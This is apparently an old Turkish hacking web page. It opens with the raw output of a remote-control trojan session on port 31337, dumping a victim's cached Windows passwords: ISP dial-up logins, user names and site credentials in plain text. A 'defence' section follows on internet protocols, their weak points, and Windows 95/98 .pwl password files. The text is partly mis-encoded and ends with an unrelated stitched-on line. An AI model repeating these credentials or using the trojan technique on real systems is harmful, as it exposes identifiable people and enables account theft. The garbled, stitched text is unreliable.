** 0 ing host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1 ystem passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337 ---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: '›óå‘P'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password: ':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*RnaAT&T WorldNet [email][email protected]'
Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*RnaMicrosoft Internet Referral Serviceicwsignup' Password:
'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*RnaTurk Nokta Netabaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*RnaTurk Nokta Netburak' Password: 'burak '
index:10(06) len:22(14/02)
Resource: '*Rnasolamnýk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*RnaTurk Nokta Netnecatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*RnaAlnetersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*RnaBurakrbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*RnaBaðlantým 5rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*RnaBurakr1056700' Password: 'DABmvsVG•('
index:18(06) len:40(19/122)
Resource: '*RnaBurakdoganalp' Password: 'alpdogan<BR>ß '
index:19(06) len:18(10/02)
Resource: '*Rnanolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*RnaBurakb1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*RnaAÝDATAsuen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*RnaBaðlantým 4merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*RnaBaðlantým 7 baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rnabayrakbaycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*RnaBurakburak' Password: 'burakì '
index:12(06) len:30(16/62)
Resource: '*RnaAlnetmerko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rnacenkbaycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password: 'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
------------------------- End of Data -------------------
SAVUNMA
Acilis konusmasi ile olaya
baslayalim;boyle bir sayfa yapma amacim kendini hacker sanan oysa sadece
elindeki bazi programlardan nuke atmaktan oteye gitmeyen
arkadaslara(Yani Lamer'lara) karsi onlem almak.Her ne kadar bu
arkadaslar hacker olmasada bu arkadaslarin elindeki programlarin verdigi
zaralari gos ardý etmemek gerek.
Oncelikle sik karsilastiginiz onemli
internet protokollerini aciklayalim IP internet protocol)20 byte
dan olusan internetteki her seyin tasindigi veri iletisim
protokoludur.Diger protokollerin hepsi bu protokolden tasinirve ve ip
nin sonuna eklenir.Ip nin icinde paket parcalama ofseti,izleyen protokolun
tipi,paketin canli kalacagi sure,kaynak ip adresi,hedef ip adresi gibi
alanalr vardir TCP Transmission Control Protokul)TCP,ana uzunlugu
20 byte olan
www,e-mail,irc gibi internette en cok kullanilan iletisim protokoludur
ICMP internet control messaging protokol)bu protokol teshis
etme ve mesejlasmayi iceririr.Bilgisayarlar arasindaki hat hizini ve
bilgisayarin
hatta olup olmadigini anþamak icin kullanilir.Mesala ping komutu ile
bunu yapabilir ilerleyen bolumlerde bu ozelligi kullanarak hattan dusmeyi
engelleyen bir program verecegim. IGMP internet group manegement
protokol)ismindende anlasildigi gibi bilgisayar gruplarina bilgi alinip
gonderilmesini saglar.Ýnternet
uzerinde bir cok radyo bu protokolle yayin yapar. Simdide
saldiri icin kullanilan temel acikliklari inceleyelim
IP'nin zayif noktalari:Ip'nin en buyuk acik noktasi gelen ve giden
bilginin kaynaginin ve iceriginin kontrol edilmemesidir.Bu yolla yeterli
bir bilgi veya bazi programlarla bilgisayar yanlis bilgi gonderile-
rek bilgisayara hack edilebilir veya bilgisayar kilitlenebilir. Network
topolojisinin zayif noktalari:Eger network uzerinde anahtar
kullanmiyorsaniz gonderdiginiz bilgi tum aga ugrar.Bu durumdan belli bir
programlarla yaralanalinilabilir.Ornegin bu yontemle ag uzerinde
sizin yaptiginiz butun gorusmeler izlenebilir
pwl : password list
Kýsaca pwl(PassWord List)
dosyasýndan bahsetmek istiyorum. Bu dosya windows95/98'deki tüm
cached ve kayýtlý password'lerin olduðu bir
dosyadýr. Yani kullanýcý internete baðlanmak için
ISP þifresini yazacaktýr, bu þifre büyük ihtimalle
bilgisayarýn hafýzasýnda yer edecektir ve .pwl
dosyasýnda da listelenecektir.
Bu dosya c:windows dizini altýnda bulunur. Kullanýcý
adýnýn ilk 8 karakteri ve .pwl uzantýsýndan
oluþur. Yani benim kullanýcý adým "PooLSharK"
ise pwl dosyam "poolshar.pwl"dir. Hatta þimdi kendinizinkini bile
hemen bulabilirsiniz. Tek yapmanýz gereken c:windows dizinine
gidip pwl dosyasýný bulmaktýr.
Çoðu password burada listelenir. Ancak bir metin editörü (ör: notepad)
ile bu dosyayý açarsak içerisinde anlamsýz karakterlerden
baþka birþey olmadýðýný görürürz.
Bunun nedeni ise þifrelerin belirli bir algoritma ile kodlanarak
saklanmasýdýr. Evet aynen öyle, kullanýcý
þifreleri þifrelenmiþ olarak bulunur. Yani .pwl
dosyasýnýn içindedir ancak anlaþýlýr bir
þekilde deðildir zira aynen aþaðýdaki gibidir:
–c. . .... .
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR. . .
. . Î. . . . . . ×. —.QDæù0”Á.æ.õˆí.ËÞ.„,{”¬M
.}.¤”[C.›. e¬€âUwØ.ž°ÅR‚’'õ¦qbtÝózåºÝ²½.†
“ûžu¶Üš§òo+.*á.ó.…0ÏC...&127;ÆûéDŠ
.6dU˜:ù
ý.PsMS»V©EBʪ¡$ç¢Í!Õ.Ìßl± â.Ž”Léa4o.•2±çu°
éŠ.Îw‡û^l—¹ˆ§`×vm™.v
“a×`ÔžÛ5AȨ.Ì{a2P–ñÚ
(Þifrenin orjinalliðini bozmak
için onu biraz kýsalttým, normalde daha uzun)
Ancak birþey eklemek istiyorum. Her zaman pwl
dosyasýný kýrmak iþe yaramayabilir. Yani içi
boþ da olabilir. Bu demek olmuyor ki o kiþinin hiç
kayýtlý þifresi yok. Tabii var ancak pwl
dosyasýna kaydedilmesine izin vermemiþ olabilir. Örnek olarak
superonline kullanýcýlarýnýn çoðunun
kullandýðý Superonline Guide programýný
ele alalým. Bu program sizi otomatik olarak internete baðlamaya
yarar ve bunun içinde kullanýcý adýnýz ve
parolayý program içerisindeki bir bölümde girmeniz gerekir. Program
sizin parolanýzý (þifrenizi) nete her
baðlanýþýnýzda ISP'nize iletecektir ve
internet baðlantýsýný kurarken username, password
gibi alanlar ile ilgilenmenize gerek kalmaz çünkü Superonline Guide bunu
sizin için yapar. Tamam yapar yapmasýna da nasýl yapar? Yani
bir kere programa username ve pw'ümüzü veriyoruz, o biz ne zaman istesek
kullanýyor bizim için. Tamam ama, bilgisayarý açýp
kapattýðýmýz zaman nasýl oluyor da bizim
pw'ler uçup gitmiyor? Demek ki þifrelerin bir yerde
kayýtlý olmasý gerekli. Ýþte bu
þifreler .pwl dosyasýnda saklanýyor. Program
þifreye ihtiyaç duyunca oradan alýyor, kullanýyor.
Ancak daha demin dedim ki, pwl dosyasýnýn kýrmak her
zaman þifrelerin açýða çýkmasýný
saðlamaz. Eðer kullanýcý pw'lerini unutmamak için
veya sürekli pw girmekten býktýðý için
yardýmcý bir program kullanmýyorsa (ör uperguide,
int.explorer'ýn pw hatýrlatma özelliði vs) yani, her
seferinde þifrelerini elle giriyorsa, bilgisyarýn diskini hiç
araya sokmuyorsa o zaman pw'ler pwl dosyasýna yazýlamaz.
Çünkü kullanýcý onlarý biryere kaydettirmiyor. Her
seferinde el ile giriyor Şu Belirsiz Ruhlara Pek Kızgınım bütün saygısı onların, bir eziyettir, bütün övgüleri bıkkınlık ve utanç
emeğe saygı 
